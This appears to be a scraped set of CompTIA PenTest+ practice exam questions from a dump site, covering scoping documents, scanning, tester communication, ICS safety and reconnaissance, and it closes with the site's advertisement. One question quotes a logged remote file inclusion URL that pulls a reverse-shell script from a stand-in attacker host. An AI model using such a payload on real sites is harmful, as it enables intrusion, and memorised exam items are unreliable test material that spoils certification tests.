Which of the following documents BEST describes the manner in which a security assessment will be conducted?
A. BIA
B. SOW
C. SLA
D. MSA
After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?
A. Services are not listening
B. The network administrator shut down services
C. The host was not reachable
D. A firewall/IPS blocked the scan
Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO)
A. The tester discovers personally identifiable data on the system
B. The system shows evidence of prior unauthorized compromise
C. The system shows a lack of hardening throughout
D. The system becomes unavailable following an attempted exploit
E. The tester discovers a finding on an out-of-scope system
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?
A. arPspoof
B. nmap
C. responder
D. burpsuite
A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?
A. Insider threat
B. Nation state
C. Script kiddie
D. Cybercrime organization.
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling.
Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
A. Data flooding
B. Session riding
C. Cybersquatting
D. Side channel
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
A. Scraping social media sites
B. Using the WHOIS lookup tool
C. Crawling the client's website
D. Phishing company employees
E. Utilizing DNS lookup tools
F. Conducting wardriving near the client facility
Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT1-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.